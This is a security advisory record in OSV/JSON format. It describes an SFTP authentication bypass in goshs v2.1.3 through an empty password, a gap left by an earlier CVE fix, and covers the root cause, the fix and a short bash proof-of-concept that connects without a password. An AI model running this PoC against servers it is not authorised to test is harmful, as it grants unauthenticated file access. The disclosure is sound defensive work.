{"id":"GHSA-rjrw-mjq6-hpmm","summary":"goshs SFTP authentication bypass via empty password (incomplete fix of CVE-2026-40884)","details":"## Summary\n\nStart goshs v2.1.3 with `-b 'admin:' -sftp`. No `-fkf`. SFTP accepts connections without password. CVE-2026-40884 blocks the empty-username variant (`-b ':pass'`). The empty-password variant bypasses that fix.\n\n## CVE-2026-40884\n\n**CVE-2026-40884** (GHSA-c29w-qq4m-2gcv, Apr 13 2026) reported the empty-username case: `-b ':pass'` with `-sftp`. `sftpserver.go:85` uses `&&`:\n\n```go\nif s.Username != \"\" && s.Password != \"\" {\n    sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool {\n        return subtle.ConstantTimeCompare([]byte(ctx.User()), []byte(s.Username)) == 1 && subtle.ConstantTimeCompare([]byte(password), []byte(s.Password)) == 1\n    }\n}\n```\n\nEmpty username → `Username != \"\"` false → `PasswordHandler` nil. No `-fkf` means `PublicKeyHandler` also nil. gliderlabs/ssh sees all handlers nil and sets `NoClientAuth = true`. Unauthenticated access.\n\nPatrickhener fixed it with a sanity check at `sanity/checks.go:114-118`:\n\n```go\nif opts.FTP && opts.FTPSFTPMode && strings.HasPrefix(opts.BasicAuth, \":\") {\n    logger.Fatal(\"When using SFTP with password authentication, the username cannot be empty. ...\")\n}\n```\n\n`HasPrefix(\":\")` catches empty username. It does not catch empty password.\n\n## Empty Password Bypass\n\nSame `&&` at `sftpserver.go:85`. Same nil handler. Different input:\n\n```\ngoshs -b 'admin:' -sftp\n```\n\n- `Username = \"admin\"`, `Password = \"\"`\n- `Username != \"\" && Password != \"\"` → false. Password is empty.\n- `PasswordHandler` not set. No `-fkf` → `PublicKeyHandler` not set.\n- gliderlabs/ssh → `NoClientAuth = true`.\n\nCVE-2026-40884 patched the symptom (empty username) with input validation. Root cause (`&&`) stayed in the code. v2.1.3 still has it. That makes any unanticipated input format exploitable.\n\n## PoC\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nHOST=\"${1:-127.0.0.1}\"\nPORT=\"${2:-2121}\"\n\necho \"[*] Connecting to goshs SFTP at $HOST:$PORT with empty password...\"\necho \"ls -la /\" | sftp -o StrictHostKeyChecking=no \\\n  -o UserKnownHostsFile=/dev/null \\\n  -o PreferredAuthentications=none,password \\\n  -o PubkeyAuthentication=no \\\n  -P \"$PORT\" -b - admin@\"$HOST\" 2\u003e&1 && \\\n  echo \"[+] VULNERABLE: Connected without password!\" || \\\n  echo \"[-] Connection failed (patched or not running)\"\n```\n\n## Root Cause\n\n```go\n// Wrong: &&\nif s.Username != \"\" && s.Password != \"\" {\n\n// Correct: ||\nif s.Username != \"\" || s.Password != \"\" {\n```\n\n`&&` blocks `PasswordHandler` when either field is empty. `||` installs it when either field is set.\n\n## Incomplete Fix\n\nPatrickhener added `HasPrefix(\":\")` at `sanity/checks.go:116`. Two gaps remain:\n\n1. `&&` still at `sftpserver.go:85` in v2.1.3\n2. No `HasSuffix(\":\")` check for empty password\n\n## Impact\n\n- Unauthenticated SFTP file access (read, write, delete, rename)\n- Same impact as CVE-2026-40884 via a different input\n- Exploitable with `-b 'user:'` and no `-fkf`\n\n## Affected\n\nAll goshs versions including v2.1.3. CVE-2026-40884 fix does not cover this variant.\n\n## Recommended Fix\n\n1. `&&` → `||` at `sftpserver/sftpserver.go:85`\n2. `HasSuffix(\":\")` check at `sanity/checks.go`\n3. Shared auth handler setup for HTTP and SFTP code paths","aliases":["CVE-2026-62325","GO-2026-6132"],"modified":"2026-08-18T15:10:54.039070447Z","published":"2026-07-28T21:56:28Z","database_specific":{"cwe_ids":["CWE-306"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-07-28T21:56:28Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/goshs-labs/goshs/security/advisories/GHSA-rjrw-mjq6-hpmm"},{"type":"WEB","url":"https://github.com/goshs-labs/goshs/commit/32f4a0e1790a709f722d0f3b2341f139d003180a"},{"type":"PACKAGE","url":"https://github.com/goshs-labs/goshs"},{"type":"WEB","url":"https://github.com/goshs-labs/goshs/releases/tag/v2.1.4"}],"affected":[{"package":{"name":"github.com/patrickhener/goshs/v2","ecosystem":"Go","purl":"pkg:golang/github.com/patrickhener/goshs/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.1.3"},{"fixed":"2.1.4"}]}],"versions":["2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-rjrw-mjq6-hpmm/GHSA-rjrw-mjq6-hpmm.json"}},{"package":{"name":"goshs.de/goshs/v2","ecosystem":"Go","purl":"pkg:golang/goshs.de/goshs/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.1.3"},{"fixed":"2.1.4"}]}],"versions":["2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-rjrw-mjq6-hpmm/GHSA-rjrw-mjq6-hpmm.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}]}